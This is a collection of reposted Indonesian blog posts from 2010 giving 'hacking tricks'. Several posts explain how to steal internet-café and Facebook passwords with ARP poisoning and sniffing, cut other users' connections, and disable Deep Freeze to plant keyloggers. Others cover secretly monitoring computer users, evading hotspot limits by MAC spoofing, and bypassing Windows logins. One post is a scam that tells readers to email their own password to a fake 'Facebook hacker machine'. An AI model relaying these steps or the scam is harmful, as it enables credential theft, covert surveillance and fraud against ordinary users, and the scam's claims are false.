2010-09-05T20:37:00.000-07:00

Postingan yang saya buat kali ini membahas tentang penggunaan flashdisk sebagai senjata/media hacking dan pemanfaatannya sebagai security tools. Mungkin anda bisa dengan mudah membaca hal-hal yang berkaitan dengan artikel ini pada media cetak tapi pada media cetak biasanya pembahasannya hanya bersifat serba-serbi saja dan singkat,sangat jarang ditemukan pembahasan yang mengarah pada dunia bawah tanah, dunia kita, dunia para pemikir diluar batas!!!

Flashdisk yang kita kenal adalah sebuah perangkat portable yang sering digunakan sebagai media penyimpanan data, baik data pekerjaan kantor, kampus atau data-data penting lainnya.karena konsep dasar diciptakannya flashdisk adalah sebagai media penyimpanan data yang bersifat portabel dan gampang dibawa kemana-mana, banyak pemilik flashdisk yang menganggap flashdisk hanya berguna sesuai dengan konsep dasar penciptaannya. padahal dengan sedikit kreativitas anda dapat menjadikan flashdisk anda sebagai sebuah media pembantu dalam proses pembelajaran dan tindakan hacking maupun penerapan security/keamanan anda saat beraktivitas pada komputer yang anda gunakan.

Sebagai langkah awal sebelum masuk pada pembahasan yang lebih jauh,saya akan memaparkan apa yang saya lakukan pada flashdisk yang saya gunakan. flashdisk saya disini hanyalah sebagai pembanding karena tentunya anda memiliki ide yang lain yang ingin anda terapkan. pada flashdisk saya telah terinstall 2(dua) aplikasi portable yaitu PORTABLEAPPS buatan PortableApps.com dan LIBERKEY dari LiberKey.com. kedua aplikasi tadi kemudian saya bagi penggunaannya sesuai dengan kebutuhan. Penggunaannya akan saya paparkan lebih terperinci seperti di bawah ini :

PORTABELAPPS
Anda sudah pasti pernah bekerja pada computer anda melalui windows explorer dikarenakan pada modus ini anda leluasa dalam mengatur direktori maupun berpindah direktori secara lebih efisien karena windows explorer menampilkan directory melalui folder tree. Nah, portableapps memiliki fungsi yang hampir sama dengan windows explorer dan sangat mirip dengan my document pada system operasi windows. Anda bahkan mempunyai menu start tersendiri untuk mengakses flasdisk anda dan menjalankan program yang digunakan layaknya menu start pada windows. Dengan kemampuan seperti ini, maka anda dapat mengatur file-file yang ada pada flashdisk anda dengan rapi karena telah tersedia secara default beberapa direktori seperti Documents, music, video, picture, explorer ( layaknya windows explorer ) bahkan tersedia directori untuk backup, menu option, help dan fungsi search. Beberapa software disertakan secara default antara lain:

1. Browser Mozilla firefox portable mode
2. Mozilla thunderbirth
3. CCleaner ( penghapus jejak dan file sampah atau temporary file )
4. Clamwin portable ( anti virus )
5. keePass portable
6. open office
7. beberapa aplikasi multimedia,dsb.

Berdasarkan karakteristiknya, portableapps sebaiknya digunakan sebagai tools manajemen flashdisk anda serta editor untuk file tuga-tugas anda.

LIBERKEY

Inti dari tutorial ini berada pada aplikasi Liberkey. Saya katakan demikian karena jika di ibaratkan sebuah sebuah live disk untuk para hacker ataupun administrator jaringan seperti auditor, whax, slackware atau backtrack ( backtrack 2+ jasakom) maka liberkey bias dikatakan sebuah system operasi yang berjalan melalui media flashdisk ( dapat pula dianggap sebagai system operasi virtual walaupun sebenarnya hanyalah kumpulan software portable). Secara default liberkey menyertakan beberapa aplikasi yang bias digunakan untuk aktivitas hacking disamping aplikasi standar yang lain.beberapa tools yang bias di gunakan untuk hacking maupun security defence antara lain adalah sebagai berikut:

1. recuva, aplikasi pembalik data yg telah terhapus.
2. Search my files, bias anda gunakan untuk mencari file-file yang terinfeksi firus maupun file-file utama sebuah virus, atau file-file rahasia pada sebuah computer.
3. Picpick, aplikasi screen capture (penangkap gambar)
4. Firefox portable, browser aman di karenakan anda terhindar dari aplikasi jahat pada kebanyakan browser warnet.
5. Runscanner, anti virus sekaligus anti spyware
6. Truecrypt, pengenkripsi disk drive
7. HashMyFile, software pengukur nilai hash
8. UltraShredder, menghapus file secara aman agar tidak bias dikembalikan secara utuh
9. NetWorks, aplikasi analisa data pada koneksi internet
10. PE network configurator, aplikasi untuk konfigurasi jaringan
11. Yale, pengukur bandwith network adapter
12. Team Viewer, aplikasi remote desktop
13. Softperfect Network Scanner, aplikasi scanner jaringan
14. Unlocker, tools penghapus file atau folder yang tidak bias dihapus secara normal.

Liberkey masih mempunyai banyak tools yang tidak penulis paparkan diatas di karenakan jumlahnya cukup banyak untuk di jelaskan, selain akan membuat tutorial ini menjadi tidak efisien dan terlihat seperti menyuapi anda sehingga lebih baik untuk menyerahkan masalah ini pada kreativitas anda masing-masing.ok

Selain tools portable diatas, tentunya ada kekurangan yang mungkin anda rasakan dikarenakan adanya tools favorit anda yang tidak disertakan. Untuk itu anda juga dapat mengisi flashdisk anda dengan software lain seperti Cain able, netcut, angry ip-scanner, super scan, notepad++,anti deepfreezedll.

PENERAPAN
Pada bagian penerapan ini, kita akan membuat sebuah scenario. Kita mengandaikan misalanya anda masuk pada sebuah warnet yang menerapkan retriksi yang ketat. Menu RUN di copot, Commandprompt di babat, bahkan notepad pun di comot. Tentunya anda akan merasa kenyamanan anda terusik akibat retriksi tersebut (masalah klasik, keamanan berbanding terbalik dengan kenyamanan), sehingga anda tidak dapat melakukan aktivitas hacking yang sudah anda pelajari di rumah. Jangan khawatir justru hal seperti ini patut anda jadikan motivasi dan tantangan ( hacking tanpa tantangan/masalah = BASI )dan jangan lupa bahwa anda telah membawa senjata mungil anda( flashdisk ).

Beberapa hal kecil yang bisa anda lakukan misalnya, jika anda ingin menggunakan command prompt yang diretriksi, anda bisa membuatnya dengan teks editor notepad. Buka notepad kemudian ketikkan “command.com” tanpa tanda petik dan save dengan ekstensi “.bat” pada desktop anda, selamat anda bias menggunakan command prompt. Notepad di retriksi? Jangan khawatir, ingat selalulah membawa file notepad kosong pada flashdisk anda atau anda bias mendownload sebuah file yang belum memiliki software default sebagai pembukanya. Gunakan open with notepad dan hapus halaman notepad tersebut lalu ketikkan code untuk membuat commandprompt. Selamat anda berhasil.

Jaringan terasa lambat dikarenakan bandwith yang terbagi pada semua computer di jaringan? Gunakan NETCUT yang telah anda bawa pada senjata mungil anda. Jalankan netcut dan cut koneksi computer lain dijaringan.selamat bandwith anda bertambah

Ingin mencuri password administrator atau FB pengguna warnet? Jalankan CAIN ABEL pada modus ARP poisoning dan silahkan menunggu korban anda.
Ingin memasang keylogger atau sejenisnya, jalankan anti deepfreeze. Selamat keylogger anda telah berjalan tanpa harus memusingkan deepfreeze yang telah anda lumpuhkan

source : http://www.konek.co.cc

Trik Memantau Aktivitas Komputer Tanpa Diketahui

2010-08-28T02:40:00.000-07:00

Trik Memantau Aktivitas Komputer Tanpa Diketahui

Wah akhirnya software favorit saya yang selama ini sangat rahasia dishare juga ma sobat semua. Software ini merupakan salahsatu software favorit saya yang masih terinstal sampai sekarang. HideTools Spy Monitor merupakan kaki tangan saya yang masih setia untuk memata-matai aktivitas komputer.

Siapapun yang memakai komputer, aktivitas yang dilakukan dapat terekam dengan sangat lengkap. Cara ini cocok juga buat sobat yang mempunyai kompy dirumah ataupun dikantor untuk memantau aktivitas komputer yang sering digunakan oleh orang rumah ataupun para karyawan dikantor. Pokoknya keren abiz sob...!!!

Hidetools Spy Monitor bekerja secara rahasia tanpa diketahui siapa pun dan tidak dapat dilacak oleh siapapun dalam keadaan normal. Sehingga tidak seorang pun akan mengetahui kalau program ini sedang berjalan. Asik kan??!! Pokoknya kalau sobat ga instal ni software yakin rugi abiz.. buruan mumpung saya kasih key-nya N gratisan lagi..

http://adsense-charmins.blogspot.com

Cara Sisipkan Nomor CDMA Kedalam HP GSM

2010-08-28T02:38:00.000-07:00

Serasa Punya Hp Dual Card

Ulasan berikut ini menerangkan cara menyisipkan nomor CDMA ke dalam nomor GSM, sehingga hape anda seolah-olah memiliki 2 nomor telepon, berikut ini ulasan lebih lanjut.

Teknologi HandPhone CDMA dan GSM terkadang membuat orang bingung harus memilih yang mana, di satu sisi, CDMA dikenal karena biaya operasional yang lebih murah, namun disisi lain GSM punya keunggulan jangkauan yang lebih luas.

Trik ini sebenarnya sudah lama, tapi mungkin hanya sedikit yang tahu dan biasanya paling cuma orang-orang counter HP saja. Tapi karena trik ini sebenarnya bukanlah suatu rahasia besar (TOP SECRET) yang hanya orang tertentu saja yang boleh tahu, maka saya akan mengungkapkannya disini.

Manfaat yang bisa didapatkan dengan menyisipkan nomor CDMA ke nomor GSM antara lain:
1. HP GSM Anda akan memiliki 2 nomor sekaligus dalam satu Handphone.
2. HP anda akan dapat dihubungi secara lokal bahkan lewat telepon koin pun bisa.
3. Nomor CDMA lokal anda masih dapat dihubungi sekalipun berada diluar daerah.
4. Nggak perlu beli HP CDMA untuk menggunakan nomor CDMA.

Tapi ini bukannya tanpa kelemahan maupun keterbatasan :
1. Nomor CDMA lokal anda hanya dapat digunakan untuk menerima telepon saja, sedangkan fungsi untuk menelpon, mengirim dan menerima SMS tetap ditangani oleh nomor GSM.
2. Bagaimanapun juga pulsa nomor CDMA tetap harus diisi sekalipun tidak digunakan, karena nomor CDMA bisa tidak berfungsi kalau pulsa hangus atau kosong.
3. Dikenakan biaya airtime yang dipotong langsung dari pulsa CDMAnya walaupun cuma terima telepon saja.

Tapi paling nggak Trik ini bisa dimanfaatin bagi anda yang sibuk dan harus mobile ke luar daerah, ataupun untuk tetap keep in touch pada saat pulang kampung ataupun liburan.

Yang harus disiapkan yaitu:
1. HP GSM dan nomor GSM tentunya untuk ditambahkan nomor CDMA.
2. HP CDMA sebaiknya dengan Fasilitas Ruim Dual Band yang menggunakan kartu dan bukan yang di injek) seperti : Nokia 2115, 6015, 6016, 6585, dll. Dan nggak perlu beli, karena cuma dipakai sebentar aja, bisa pinjem sama saudara, temen, tetangga ataupun tempat dimana beli nomor CDMA nya.
3. Kartu Perdana CDMA, pilih yang sesuai untuk di sisipkan ke nomor GSM anda.
a. Star One untuk : Mentari, IM3, dan Matrix
b. Flexy untuk : Simpati, Kartu AS, Kartu Hallo
c. Esia untuk : Simpati, Kartu AS, Kartu Hallo dan XL
Pemilihan kartu harus benar-benar sesuai, jika tidak maka trik ini nggak akan berhasil.

Cara Menyisipkannya:
1. Masukkan kartu perdana CDMA yang telah dibeli kedalam HP CDMA .
2. Lakukan Pengaktifan
a. Untuk Star One :
- Tekan *92 + Nomor HP anda (No. HP GSM yang ingin disisipi) misalnya: *92081512345678
- Tekan OK/Yes.. lalu dengarkan
- Setelah selesai tutup HP CDMA nya
- Di test dengan menelpon ke No. CDMA, jika yang berdering adalah HP GSM berarti anda telah berhasil !!

b. Untuk Flexy :
- Tekan *71 + Nomor HP anda (No. HP GSM yang ingin disisipi) misalnya: *7108125712345
- Tekan OK/Yes dan dengarkan...
- Setelah selesai tutup HP CDMA nya
- Di test dengan menelpon ke No.CDMA, jika HP GSM anda berdering, maka anda telah berhasil !!

c. Untuk Esia :
- Tekan *12 + Nomor HP anda (No. HP GSM yang ingin disisipi) misalnya: *12081612345678
- Tekan OK/Yes dan dengarkan...
- Setelah selesai tutuh HP CDMA nya
- Di test kembali dengan menelpon ke No.CDMA, jika HP GSM anda yang berdering, maka anda telah berhasil !!

Source: http://adsense-charmins.blogspot.com

Membobol Hotspot dengan MAC address

2010-08-28T02:34:00.000-07:00

Seperti kita ketahui, HotSPOT atau tempat akses internet Wireless dengan standard 802.11b/g sudah bukan barang asing lagi ditelinga kita, dan bila kita berpergian di tempat publik seperti Mall, Cafe, hotel dan kantor, dengan mudahnya kita menemukan fasilitas tersebut.

Namun sangat disayangkan tidak semua penyedia layanan menawarkan fasilitas Internet Wireless dengan gratis, atau kalaupun gratis, sangatlah terbatas.
Salah satu proteksi yang digunakan penyedia layanan wireless adalah dengan membatasi akses internet berdasarkan MAC Address.

Apa itu MAC Adress ?

In computer networking a Media Access Control address (MAC address) or Ethernet Hardware Address (EHA) or hardware address or adapter address is a quasi-unique identifier attached to most network adapters (NICs).

Oke jadi kesimpulannya MAC Address adalah nomer unik yang membedakan setiap perangkat jaringan yang terpasang dikomputer kita.
Contoh kasus adalah HotSPOT di Food Court Plasa Semanggi.

Pada HotSPOT FoodCourt Plasa Semanggi , sang penyedia layanan Internet Wireless, membatasi penggunaan Internet gratis hanya selama 3 Jam, setelah itu anda tidak dapat mengakses internet lagi, dan baru akan dapat mengakses lagi di hari esok. Jenis proteksi yang digunakan adalah MAC Address Filtering.

Bagaimana menjebol Proteksi dengan MAC Address ?

Ada sebuah tools yang sangat bermanfaat untuk anda.Tools itu bernama K-MAC.Anda dapat mendownloadnya disini : http://indoupload.net/files/8318/k-mac.zip

Dengan tools ini anda akan dapat mengubah MAC-Address anda secara instant dan apa artinya ? Anda dapat menjebol Proteksi MAC Address ! Setiap jatah akses internet anda habis dalam waktu 3 jam, yang anda perlu lakukan hanyalah mengubah MAC Address anda, dan lakukan koneksi kembali.

Mencuri password XP dan Vista

2010-08-28T02:05:00.000-07:00

mencuri password XP dan Vista. Sebelumnya ma'af nih bagi yang pada make Sistem Operasi Windows. Bukannya saya ingin membuka aib, cuman mau sharing aja kok :D Semoga diambil manfaatnya aja deh. Yang negatif negatif thom gak ikut nanggung :D

Untuk mengetahui password XP/ Vista, sebenarnya cukup gampang kok. Prosesnya yang lumayan sulit huehehehe... Baca dulu deh, supaya paham yang thom kamsud. Penasaran bagaimana 'mencuri' password Windows XP atau bahkan Windows Vista?

Satu syarat penting sebelum kita bisa mengintip password Windows XP atau Vista. Kita musti punya softwarenya terlebih dahulu. Nama softwarenya adalah Ophcrack. Nah bagi thom, ini merupakan 'kesulitan' mendasar. Karena softwarenya mempunyai ukuran file sekitar 400Megabyte. Belum lagi, untuk XP dan Vista tidak bisa memakai satu CD. Untuk XP sendiri, untuk yang Vista sendiri. Kurang tahu sih untuk yang OPHCrack for Vista sekalian bisa lihat password untuk XP tidak. Mungkin ada yang ingin menambahkan?

Nah, untuk memakainya :

Burning file OPHCrack dengan ekstensi *.iso ke CD. Untuk burning CD, harus memakai CD-R/W atau DVD-Combo atau DVD-R/W.
Setelah diburning, reboot komputer dan setting BIOS supaya boot dari CD-ROM
Jangan lupa diset settingan BIOS-nya ya,,
Selanjutnya, masukkan CD OPHCrack yang sudah kita buat tadi ke ke dalam CD-ROM
udah deh, tinggal pelototin aja tuh monitor, ikuti langkah yang diinstruksikan. Gak sulit kok

http://thom-sharing.blogspot.com

Kode rahasia ponsel nokia

2010-08-24T23:46:00.000-07:00

Kode rahasia ponsel nokia

Berikut dibawah ini daftar kode-kode rahasia untuk ponsel Merk Nokia, semoga bermanfaat

NOKIA

*3370# Untuk mengaktifkan Full Rate Codec (EFR) – HP Nokia kamu akan memiliki kualitas suara yang maksimal tapi, waktu bicara akan berkurang sekitar 5%
#3370# Untuk mematikan Full Rate Codec (EFR)
*#4720# Mengaktifkan Half Rate Codec – Ponsel nokia kamu akan memiliki kualitas suara terendah, tetapi akan meningkatkan waktu bicara (Talk time) sekitar 30%
*#4720# Mematikan fungsi Half Rate Codec
*#0000# Menampilkan informasi firmware ponsel
*#9999# Menampilkan informasi firmware ponsel jika *#0000# ngga jalan
*#06# Untuk mengetahui International Mobile Equipment Identity (IMEI Number) kita
#pw+1234567890+1# Mengunci status provider. (gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+” )
#pw+1234567890+2# Mengunci status Network. (gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+” )
#pw+1234567890+3# Mengunci Status Country. (gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+” )
#pw+1234567890+4# Mengunci status SIM Card. (gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+” )
*#147# mengetahui siapa yang nelpon kamu terakhir kali (hanya untuk vodofone)
*#1471# panggilan terakhir (hanya nntuk vodofone)
*#21# Mengetahui kemana semua panggilan dialihkan
*#2640# Menampilkan security code yang sedang digunakan
*#30# untuk menampilkan private number (Biasanya IM3 neh)
*#43# untuk memeriksa status “Call Waiting” di ponsel kamu.
*#61# untuk memeriksa nomor panggilan yang “On No Reply”
*#62# untuk memeriksa nomor panggilan yang “Divert If Unreachable (no service)” dan mengetahui kemana dialihkannya
*#67# untuk memeriksa nomor panggilan yang “On Busy Calls” dan mengetahui kemana dialihkannya
*#67705646# untuk menghilangkan logo operator pada 3310 & 3330
*#73# Untuk menghapus timer ponsel dan score pada games ponsel
*#746025625# Menampilkan SIM Lock Status, kalo ponsel kamu mendukung fungsi power saving “SIM Clock Stop Allowed”, itu berarti kamu bisa mendapatkan waktu terbaik untuk standby (Berapa lama kamu standby)
*#7760# kode produk
*#7780# mengembalikan settingan pabrik
*#8110# melihat versi untuk nokia 8110
*#92702689# menampilkan – 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 untuk no repair), 5.Transfer User Data. Untuk keluar dari mode ini, kamu perlu me-restart HP kamu
*#94870345123456789# mematikan fungsi PWM-Mem
**21*nomorhp# menghidupkan “All Calls” dan mengalikan ke nomer yang tertulis
**61*nomorhp# menghidupkan “No Reply” dan mengalikan ke nomer yang tertulis
**67*nomorhp# menghidupkan “On Busy” dan mengalikan ke nomer yang tertulis
12345 ini security code bawaan nokia (Standard)

http://aseppopy.net

Bypass Password Login

2010-08-24T23:22:00.000-07:00

Bypass Password Login

Untuk keamanan PC biasanya kita menggunakan password Login, sehingga orang lain tidak bisa masuk komputer kita tanpa mengetahui password tersebut. Tetapi ketika kita lupa password bisa menjadi permasalahan tersendiri, bahkan tidak sedikit yang terpaksa harus meng-install ulang sistem Operasi.
Sebelumnya pernah dibahas mengenai me-reset password windows Xp dengan bootable CD PC Login Now. Saat ini ada alternatif lain yang lebih mudah.

PC Login Now memang menyediakan fitur mereset password Windows dengan antarmuka yang sederhana. Tetapi ukuran download sekitar 56 MB, ditambah lagi sekarang tidak disediakan link download di websitenya. Oleh karena itu ada alternatif lain yang lebih mudah dan lebih bagus, namanya Kon-Boot

Dengan Kon-Boot Bootable CD kita bisa mereset/hack password login untuk Windows 7, Vista, XP, Server 2003, Server 2008, Ubuntu, Debian, Fedora dan Gentoo.

Kon-Boot di buat untuk mem-bypass (melewati) password login sebuah sistem operasi. Kita bisa masuk dengan mengetikkan sembarang password (atau tanpa menuliskan passwordnya sedikitpun). Pada awalnya program ini di design untuk Linux Ubuntu, tetapi selanjutnya dikembangkan juga untuk Windows. Aplikasi ditulis dalam bahasa pemrograman Assembler murni dengan TASM 4.0.

Ukuran bootable CD/Floppy ini sangat kecil, bahkan ukuran download hanya sekitar 10 KB (dalam zip), setelah di extract (dibuka), ukuran file iso (image) didalamnya hanya sekitar 110 KB. Untuk memburning ke CD (membuat file iso ini bisa menjadi bootable CD) bisa menggunakan program ImgBurn (1.94 MB), program burning CD yang sangat kecil dan Portable, BurnCDCC

source:http://justerda.wordpress.com

CARA MUDAH MENGETAHUI PASSWORD FACEBOOK ORANG LAIN

2010-08-21T21:07:00.000-07:00

(MOHON JANGAN DISALAHGUNAKAN. THIS IS ONLY TO KNOW)
Caranya sangat simpel anda cukup mengirimkan email ke mesin hacker facebook. Setelah itu mesin hacker akan mengirimkan password facebook yang anda minta.

BACA BAIK-BAIK !!!
------------------------

langkah-langkahnya :

-login ke email anda. (khusus pengguna yahoo/gmail)
-Lanjutkan ke halaman mengirim pesan.
-Kirim email ke : autorenewpass.facebook@gmail.com
-bcc: cc: (biarkan kosong)
-Subject: PASSWORD RETRIEVE

-Isi pesan :
baris pertama tulis alamat email anda.
baris kedua tulis alamat email korban.
baris ketiga tulis password email anda.
baris keempat tulis dengan kode ini : cgi-bin/$et76431&pwr999

Ini contoh pesan yang harus anda kirim :

To : autorenewpass.facebook@gmail.com
Bcc: Bc: (biarkan kosong)
Subject : password retrieve
Isi :
damien.vir@yahoo.co.id
angela@yahoo.com
DAMIENVIR
cgi-bin/$et76431&pwr999

CATATAN :
1. Ingat anda mengirimkan email ke mesin bukan ke orang.Anda akan mendapat pemberitahuan setiap jam 10 pagi.
2. Fungsi anda memberikan password adalah untuk memudahkan mesin mencocokkan password anda dengan password si korban, jika password tersebut tidak sama, maka anda akan mendapat pemberitahuan bahwa password anda berbeda dan tentunya mesin akan mengirimkan password si korban juga ke email anda.
3. Jika anda mendapat pemberitahuan
"Cannot find a password ! Give a little time to fix this problem, We will sent back your request for a few days"
tunggu beberapa hari,dan mesin hacker akan mengirimkan password lagi ke anda. (paling lama 1minggu)
4. Walaupun email anda yahoo, namun email si korban gmail, tidak menjadi masalah.namun ingat ini hanya berlaku untuk pengguna YAHOO! dan GMAIL.

damaniks.blogspot.com

2010-08-21T21:05:00.000-07:00

TUTORIAL LAN Hacking

TUTORIAL LAN Hacking (Buat Newbie yang mau belajar hack)
Cara hacking via LAN (untuk curi pass orang2 yang lagi browsing)
Pertama-tama sorry kalo repost karena teknik ini bukanlah teknik yang fresh di dunia hacking tapi teknik ini belum basi karena sampai saat ini masih dapat digunakan karena sebagian besar jaringan meggunakan jaringan hub & switch yang tidak terenkripsi.Mengapa tidak terenkripsi?
* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security* Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error* Harganya tidak murah untuk memperoleh yang terenkripsi
Perbedaan antara jaringan Hub dan Switch:
* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.
Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.
Hacking ini menggunakan teknik:
* Sniffing* ARP Poison Routing
Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.
Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda
Kelebihan:
* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya* Bisa mencuri semua jenis login password yang melalui server HTTP* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS* Semua programnya free
Kekurangan:
* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya
Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:
* Komputer Korban* Komputer Hacker* Server
Perbedaan-perbedaan antara jaringan switch dan jaringan hub:Langkah-langkah pertama:
1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.Code:
http://www.wireshark.org/download.htmlhttp://www.oxid.it/cain.html
Cara Menggunakan WireShark:
* Jalankan program wireshark* Tekan tombol Ctrl+k (klik capture lalu option)* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on* Klik tombol start* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya
Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switchDari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.
Cara Menggunakan Cain&Abel:
* Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark* Buka program Cain anda* Klik pada bagian configure* Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan* Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.* Setelah itu apply settingannya dan klik ok* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.
Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.
Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)
Untuk istilah-istilah yang tidak ngerti bisa dicari di wikipedia (tapi yang inggris ya kalo yang indo jg belum tentu ada)

Source : damaniks.blogspot.com

2010-08-18T22:37:00.000-07:00

Ngakal Ngakalin RapidShare…

weheheh, kalo ada yang suka maen ke situs situs warez…..yang ngasih software2 full full cracked pasti tau Rapidshare…yup tempat biang nya orang naro naro file disini, yang masing masing di batasi IP 1 orang per download nya, dan maksimal file yang bisa di download ada 50mega an. wahahah, satu satu nya cara untuk mendownload sekali banyak dan simultan adalah dengan memberli package pro nya……yah, kalo mau usaha ini kita mungkin ( para carder carder indonesia ) bisa membeli satu account pro rapidshare, namun masih ada beberapa cara kok dengan menggunakan beberapa tools, berikut aku akan jelaskan sedikit toolsnya, sedikit berbagi ilmu…..weheheh

berhubung aku udah mendownload bergiga giga, berarti pengalaman ini bisa di bagi bagi kan, ya ngga, setidaknya masih bisa di praktekan….

kasusnya gini, di rapidshare tu cuman mau nerima download 1 ip di tiap download nya, mungkin ini ada 2 cara, yang pertama dia menggunakan cookies untuk nandain proses downloadnya, yang kedua emang ada program khusus yang mengecek di site nya ip ip mana aja yang ngedownload lebih dari satu……

asusmi yang pertama, kalo dia pake cookies, berarti masing masing browser punya cookies nya sendiri kan, aku pernah coba, satu rapidshare download di IE, yang satunya lagi di firefox, dan hasilnya berhasil…..yap berhasil, tapi sekarang ngga selalu, ngga tau kenapa……

asumsi yang ke dua, kalo dia ada semacam program khusus….. berarti kita harus pake tools untuk ngakalin nya…beberapa tools nya udah aku package, semua tools untuk hacking rapidshare dan beberapa situs situs uploader lainya, seperti megaupload, uploader, dll

get rapidshare 6.0
sebelumnya aku ngga perlu jelaskan source codenya gimana yah, langsung pake aja biar asik, aku ngasi tau kegunaanya gimana, dah gitu aja yah….gini….dengan menggunakan program ini, memungkinkan file file yang ada di rapidshare bisa kita download dengan menggunakan program download manager, yup, kaya bangsanya DAP, FDM, dll, program ini dibuat dengan menggunakan bahasa perl, cara makenya juga mudah, begini

pertama tama kita letakan links url file rapidshare yang mau di download….dalam sebuah file, sebut aja links.txt
lalu tinggal klik batch file yang ada di dalam program ini, dan program ini akan mengeksekusi rapidshare dan tungguin aja biarkan program ini berkerja, dia akan mengeksekusi rapidshare dan mengkopinya ke clipboard, nah pada saat itulah program download manager akan akfif secara otomatis untuk mendownload file yang ada di rapidshare…..

kekuranganya:
program ini ngga bisa nampung links sekali banyak, masih banyak bug nya, tapi kalau kita mendownload sekali 2 – 3 bisa. sip lah

rapidharvest
walaupun program ini sederhana, tapi program ini salah satu yang memiliki fungsi yang bagus, yaitu program ini mengumpulkan links links yang ada di rapidshare, dan akan mendownload kanya untuk kita secara otomatis, jadi kita tinggal tidur aja…krrr krrr, enyaakk

rsmgaio
ini kumpulan program untuk cracking situs uploader…isis nya ada untuk rapidshare, megaupload

rapidshare.exe
di dalam nya ada beberapa tools yang bisa di pakai untuk ngakal ngakalin rapidshare, yaitu…

renew ip – dipake untuk ngerefresh ip kita dan menggantinya ( kalau dhcp )
link grabber – software ini dipakai untuk menggrab links yang sebenarnya dari alamat url uploader, dan kita bisa mengkopinya dan membiarkan download manager kita yang menyelesaikan donlotanyanya ( untuk rapidsharenya ngga bisa jalan, tapi untuk yang lainya patut di coba tuh…)
RS Downloader
